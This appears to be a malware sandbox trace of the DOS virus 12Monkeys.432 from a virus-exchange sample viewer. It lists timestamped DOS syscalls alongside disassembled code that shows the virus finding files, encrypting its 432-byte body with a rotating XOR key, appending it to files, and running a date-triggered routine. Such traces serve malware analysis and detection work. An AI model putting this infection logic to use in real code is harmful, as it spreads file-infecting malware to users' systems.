Sample viewer

vx.netlux.org/Virus.DOS.VCC.12Monkeys.432

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:14:41.077769135Z 26 PC: 13e91 | Set disk transfer address
2018-12-17T22:14:41.079551175Z 53 PC: 13e97 | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:14:41.080568236Z 53 PC: 13ea4 | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:14:41.081571588Z 44 PC: 13eaf | Get time 0x13eaf: cmp dl, 0xd
0x13eb2: jg 0x13eb8
0x13eb4: mov al, 0x82
0x13eb6: out 0x21, al
0x13eb8: mov ah, 0x2c
0x13eba: int 0x21
0x13ebc: cmp dl, 0x32
0x13ebf: jg 0x13ef0
0x13ec1: mov ah, 9
0x13ec3: lea dx, word ptr [bp + 0x190]
0x13ec7: int 0x21
0x13ec9: mov ah, 0
0x13ecb: int 0x16
0x13ecd: jmp 0x13ef0
0x13ecf: nop
0x13ed0: xor word ptr [bp + si], si
0x13ed2: and byte ptr [di + 0x6f], cl
0x13ed5: outsb dx, byte ptr [si]
0x13ed6: imul sp, word ptr [di + 0x79], 0x73
0x13eda: and byte ptr [bx + di + 0x20], al
2018-12-17T22:14:41.084113728Z 44 PC: 13ebc | Get time 0x13ebc: cmp dl, 0x32
0x13ebf: jg 0x13ef0
0x13ec1: mov ah, 9
0x13ec3: lea dx, word ptr [bp + 0x190]
0x13ec7: int 0x21
0x13ec9: mov ah, 0
0x13ecb: int 0x16
0x13ecd: jmp 0x13ef0
0x13ecf: nop
0x13ed0: xor word ptr [bp + si], si
0x13ed2: and byte ptr [di + 0x6f], cl
0x13ed5: outsb dx, byte ptr [si]
0x13ed6: imul sp, word ptr [di + 0x79], 0x73
0x13eda: and byte ptr [bx + di + 0x20], al
0x13edd: push si
0x13ede: imul si, word ptr [bp + si + 0x75], 0x2073
0x13ee3: dec cx
0x13ee4: outsb dx, byte ptr [si]
0x13ee5: arpl word ptr gs:[si + 0x65], si
0x13eea: and word ptr fs:[bx], ax
2018-12-17T22:14:41.086086376Z 78 PC: 13f09 | Find first file
2018-12-17T22:14:41.092300226Z 61 PC: 13f19 | Open file (Filename = 'IIIAAEAAOOOUUYOU$$$$$AIOUNN��?����!""�������������������������������������������������S������������������������������')
2018-12-17T22:14:41.098860914Z 63 PC: 13f27 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:14:41.105060232Z 66 PC: 13f36 | Move file pointer
2018-12-17T22:14:41.106310836Z 44 PC: 13e54 | Get time 0x13e54: cmp dl, 0
0x13e57: je 0x13e50
0x13e59: mov byte ptr [bp + 0x138], dl
0x13e5d: call 0x13e6f
0x13e60: mov ah, 0x40
0x13e62: mov cx, 0x1b0
0x13e65: lea dx, word ptr [bp + 0x100]
0x13e69: int 0x21
0x13e6b: call 0x13e6f
0x13e6e: ret
0x13e6f: mov cx, 0x172
0x13e72: lea si, word ptr [bp + 0x13e]
0x13e76: xor byte ptr [si], 0x5a
0x13e79: inc si
0x13e7a: dec cx
0x13e7b: jne 0x13e76
0x13e7d: ret
0x13e7e: lea si, word ptr [bp + 0x2ac]
0x13e82: mov di, 0x100
0x13e85: movsw word ptr es:[di], word ptr [si]
2018-12-17T22:14:41.108871624Z 64 PC: 13e6b | Write file or device (Write 432 bytes on handle 5)
2018-12-17T22:14:41.12297995Z 66 PC: 13f48 | Move file pointer
2018-12-17T22:14:41.124242568Z 64 PC: 13f53 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:14:41.13096188Z 62 PC: 13f5c | Close file
2018-12-17T22:14:41.139291548Z 79 PC: 13f09 | Find next file
2018-12-17T22:14:41.142084825Z 61 PC: 13f19 | Open file (Filename = 'IIIAAEAAOOOUUYOU$$$$$AIOUNN��?����!""�������������������������������������������������S������������������������������')
2018-12-17T22:14:41.14876713Z 63 PC: 13f27 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:14:41.15603525Z 66 PC: 13f36 | Move file pointer
2018-12-17T22:14:41.158406172Z 44 PC: 13e54 | Get time 0x13e54: cmp dl, 0
0x13e57: je 0x13e50
0x13e59: mov byte ptr [bp + 0x138], dl
0x13e5d: call 0x13e6f
0x13e60: mov ah, 0x40
0x13e62: mov cx, 0x1b0
0x13e65: lea dx, word ptr [bp + 0x100]
0x13e69: int 0x21
0x13e6b: call 0x13e6f
0x13e6e: ret
0x13e6f: mov cx, 0x172
0x13e72: lea si, word ptr [bp + 0x13e]
0x13e76: xor byte ptr [si], 0x3a
0x13e79: inc si
0x13e7a: dec cx
0x13e7b: jne 0x13e76
0x13e7d: ret
0x13e7e: lea si, word ptr [bp + 0x2ac]
0x13e82: mov di, 0x100
0x13e85: movsw word ptr es:[di], word ptr [si]
2018-12-17T22:14:41.160918084Z 64 PC: 13e6b | Write file or device (Write 432 bytes on handle 5)
2018-12-17T22:14:41.163838983Z 66 PC: 13f48 | Move file pointer
2018-12-17T22:14:41.164928098Z 64 PC: 13f53 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:14:41.166700224Z 62 PC: 13f5c | Close file
2018-12-17T22:14:41.172222093Z 79 PC: 13f09 | Find next file
2018-12-17T22:14:41.174185405Z 61 PC: 13f19 | Open file (Filename = 'IIIAAEAAOOOUUYOU$$$$$AIOUNN��?����!""�������������������������������������������������S������������������������������')
2018-12-17T22:14:41.180532417Z 63 PC: 13f27 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:14:41.187249022Z 66 PC: 13f36 | Move file pointer
2018-12-17T22:14:41.188533958Z 44 PC: 13e54 | Get time 0x13e54: cmp dl, 0
0x13e57: je 0x13e50
0x13e59: mov byte ptr [bp + 0x138], dl
0x13e5d: call 0x13e6f
0x13e60: mov ah, 0x40
0x13e62: mov cx, 0x1b0
0x13e65: lea dx, word ptr [bp + 0x100]
0x13e69: int 0x21
0x13e6b: call 0x13e6f
0x13e6e: ret
0x13e6f: mov cx, 0x172
0x13e72: lea si, word ptr [bp + 0x13e]
0x13e76: xor byte ptr [si], 0x3f
0x13e79: inc si
0x13e7a: dec cx
0x13e7b: jne 0x13e76
0x13e7d: ret
0x13e7e: lea si, word ptr [bp + 0x2ac]
0x13e82: mov di, 0x100
0x13e85: movsw word ptr es:[di], word ptr [si]
2018-12-17T22:14:41.190556585Z 64 PC: 13e6b | Write file or device (Write 432 bytes on handle 5)
2018-12-17T22:14:41.201464096Z 66 PC: 13f48 | Move file pointer
2018-12-17T22:14:41.202644747Z 64 PC: 13f53 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:14:41.208089918Z 62 PC: 13f5c | Close file
2018-12-17T22:14:41.21735351Z 79 PC: 13f09 | Find next file
2018-12-17T22:14:41.219891233Z 61 PC: 13f19 | Open file (Filename = 'IIIAAEAAOOOUUYOU$$$$$AIOUNN��?����!""�������������������������������������������������S������������������������������')
2018-12-17T22:14:41.226542005Z 63 PC: 13f27 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:14:41.236849355Z 66 PC: 13f36 | Move file pointer
2018-12-17T22:14:41.239014414Z 44 PC: 13e54 | Get time 0x13e54: cmp dl, 0
0x13e57: je 0x13e50
0x13e59: mov byte ptr [bp + 0x138], dl
0x13e5d: call 0x13e6f
0x13e60: mov ah, 0x40
0x13e62: mov cx, 0x1b0
0x13e65: lea dx, word ptr [bp + 0x100]
0x13e69: int 0x21
0x13e6b: call 0x13e6f
0x13e6e: ret
0x13e6f: mov cx, 0x172
0x13e72: lea si, word ptr [bp + 0x13e]
0x13e76: xor byte ptr [si], 0x3f
0x13e79: inc si
0x13e7a: dec cx
0x13e7b: jne 0x13e76
0x13e7d: ret
0x13e7e: lea si, word ptr [bp + 0x2ac]
0x13e82: mov di, 0x100
0x13e85: movsw word ptr es:[di], word ptr [si]
2018-12-17T22:14:41.241812024Z 64 PC: 13e6b | Write file or device (Write 432 bytes on handle 5)
2018-12-17T22:14:41.246100132Z 66 PC: 13f48 | Move file pointer
2018-12-17T22:14:41.251715145Z 64 PC: 13f53 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:14:41.253984982Z 62 PC: 13f5c | Close file
2018-12-17T22:14:41.259333352Z 79 PC: 13f09 | Find next file
2018-12-17T22:14:41.261374064Z 61 PC: 13f19 | Open file (Filename = 'IIIAAEAAOOOUUYOU$$$$$AIOUNN��?����!""�������������������������������������������������S������������������������������')
2018-12-17T22:14:41.266806144Z 63 PC: 13f27 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:14:41.276116705Z 66 PC: 13f36 | Move file pointer
2018-12-17T22:14:41.293389502Z 44 PC: 13e54 | Get time 0x13e54: cmp dl, 0
0x13e57: je 0x13e50
0x13e59: mov byte ptr [bp + 0x138], dl
0x13e5d: call 0x13e6f
0x13e60: mov ah, 0x40
0x13e62: mov cx, 0x1b0
0x13e65: lea dx, word ptr [bp + 0x100]
0x13e69: int 0x21
0x13e6b: call 0x13e6f
0x13e6e: ret
0x13e6f: mov cx, 0x172
0x13e72: lea si, word ptr [bp + 0x13e]
0x13e76: xor byte ptr [si], 0x45
0x13e79: inc si
0x13e7a: dec cx
0x13e7b: jne 0x13e76
0x13e7d: ret
0x13e7e: lea si, word ptr [bp + 0x2ac]
0x13e82: mov di, 0x100
0x13e85: movsw word ptr es:[di], word ptr [si]
2018-12-17T22:14:41.296849973Z 64 PC: 13e6b | Write file or device (Write 432 bytes on handle 5)
2018-12-17T22:14:41.300129053Z 66 PC: 13f48 | Move file pointer
2018-12-17T22:14:41.303450413Z 64 PC: 13f53 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:14:41.307700049Z 62 PC: 13f5c | Close file
2018-12-17T22:14:41.315397989Z 42 PC: 13f71 | Get date 0x13f71: cmp dh, 0x11
0x13f74: jl 0x13f95
0x13f76: cmp dl, 8
0x13f79: jl 0x13f95
0x13f7b: mov ah, 0x19
0x13f7d: int 0x21
0x13f7f: mov cx, 0x25
0x13f82: mov dx, 0
0x13f85: lea bx, word ptr [bp + 0x190]
0x13f89: push ds
0x13f8a: pop es
0x13f8b: mov byte ptr [bp + 0x251], 0x26
0x13f90: int 0x19
0x13f92: add sp, 2
0x13f95: mov ah, 0x1a
0x13f97: mov dx, 0x80
0x13f9a: int 0x21
0x13f9c: mov cx, 3
0x13f9f: push cx
0x13fa0: mov dx, 0x140
2018-12-17T22:14:41.318480388Z 26 PC: 13f9c | Set disk transfer address